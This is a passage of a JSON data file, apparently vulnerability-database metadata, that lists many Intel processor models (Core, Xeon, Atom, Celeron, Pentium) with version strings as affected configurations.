        "trust": 1.0,
        "vendor": "intel",
        "version": "4160t"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2308"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3060"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6157u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2430m"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330m"
      },
      {
        "model": "xeon e3 12201 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3470"
      },
      {
        "model": "xeon e3 1230",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138t"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5118"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "930"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4550u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350k"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2850_v2"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3235rk"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2390t"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8170"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "350m"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2538"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5520"
      },
      {
        "model": "xeon e5 2418l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176f"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "390m"
      },
      {
        "model": "xeon e3 1290 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330um"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2940"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2649m"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4200"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5504"
      },
      {
        "model": "xeon e3 1245 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5508"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3820qm"
      },
      {
        "model": "xeon e3 1280 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1281 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2560"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8156"
      },
      {
        "model": "xeon e3 1268l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3455"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2960xm"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v4"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4020y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820eq"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y51"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5520"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5300u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w"
      },
      {
        "model": "xeon e5 1660",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 1680 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5506"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5649"
      },
      {
        "model": "xeon e3 1275 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150t"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130"
      },
      {
        "model": "xeon e5 2420",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790"
      },
      {
        "model": "xeon e3 1230 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6402p"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4603_v2"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8830"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330"
      },
      {
        "model": "xeon e5 1428l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2720qm"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5539"
      },
      {
        "model": "xeon e5 1660 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4800mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3540m"
      },
      {
        "model": "xeon e3 1505m v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1800"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4603"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675r"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2350"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2758"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3338"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3225"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775c"
      },
      {
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3710"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3520"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3439y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y75"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4278u"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2820"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3537u"
      },
      {
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y57"
      },
      {
        "model": "xeon e3 1271 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1286 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4648_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675c"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "480m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "740qm"
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y32"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4950hq"
      },
      {
        "model": "xeon e3 1286l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2657m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8400"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7290"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3530"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "610e"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5700eq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2620m"
      },
      {
        "model": "xeon bronze 3104",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1230 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1280 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5119t"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6148f"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3150"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3110m"
      },
      {
        "model": "xeon e3 1270 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620le"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "950"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658a_v3"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2328m"
      },
      {
        "model": "xeon e5 2630",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1225 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v4"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "661"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "650"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5120"
      },
      {
        "model": "xeon e3 1240l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130t"
      },
      {
        "model": "xeon e5 2630 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120m"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3000"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3520m"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5675"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v3"
      },
      {
        "model": "xeon e5 1428l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2608l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775r"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3308"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v3"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5640"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hk"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1565l_v5"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8857_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440hq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670_v2"
      },
      {
        "model": "xeon e5 2620 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l3426"
      },
      {
        "model": "xeon e3 12201",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4308u"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8168"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3758"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "760"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2650l_v4"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4578u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v4"
      },
      {
        "model": "xeon e3 1505l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "965"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2540m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210u"
      },
      {
        "model": "xeon e5 2418l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5120t"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702ec"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2807"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2730"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3630qm"
      },
      {
        "model": "xeon e5 2640 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770t"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3958"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4765t"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3508"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v2"
      },
      {
        "model": "xeon e5 2608l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "550"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220t"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4109t"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3010"
      },
      {
        "model": "xeon e3 1285l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690k"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2105"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4510u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770k"
      },
      {
        "model": "xeon e3 1268l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2815"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2808"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217ue"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8100"
      },
      {
        "model": "xeon e5 1650 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3845"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4660_v4"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6167u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2515e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5157u"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3337u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "580m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750"
      },
      {
        "model": "xeon e5 1428l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240t"
      },
      {
        "model": "xeon e5 2650l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4910mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3740qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870hq"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3785"
      },
      {
        "model": "xeon e5 2630 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4025u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2635qm"
      },
      {
        "model": "xeon e3 1285 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2630l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3229y"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4102e"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5667"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v3"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770t"
      },
      {
        "model": "xeon e5 2628l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867_v4"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850"
      },
      {
        "model": "xeon e3 1258l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4302y"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3339y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700k"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5645"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8650u"
      },
      {
        "model": "xeon e3 1220 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
